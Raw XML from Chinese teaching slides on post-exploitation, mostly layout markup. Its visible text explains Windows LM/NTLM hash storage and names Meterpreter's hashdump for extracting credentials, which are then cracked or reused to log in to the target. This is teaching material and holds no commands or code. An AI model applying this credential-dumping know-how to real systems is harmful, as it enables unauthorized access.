            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.6 后渗透攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3795395" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3795395" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3129915" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>挖掘用户名和密码</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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15" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.6 后渗透攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="文本框 148"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4595495" y="1337945"/>
            <a:ext cx="6515735" cy="3692525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>微软Windows系统存储哈希值的方式一般为LAN Manger(LM)、NT LAN Manger(NTLM)和 NT LAN Manger v2(NTLMv2)。在LM存储方式中，当用户首次输人密码或更新密码的时候，密码被转换为哈希值。由于哈希长度的限制，将密码分为7个字符一组的哈希值。以password123456的密码为例，哈希值以passwor和d123456的方式存储，所以攻击者只需要简单地破解7个字符一组的密码，而不是原始的14个字符。而NTLM的存储方式跟密码长度无关，密码password123456将作为整体转换为哈希值存储。通过meterpreter中的hashdump模块可以提取系统的用户名和密码哈希值。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>得到这些HASH值之后，一方面可以利用工具对这些hash值进行暴力破解，得到其明文；另一方面，在一些渗透脚本中，以这些hash值作为输入，使其完成对目标主机的登录。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3855085" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3855085" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3189605" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>获取控制权</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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20" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
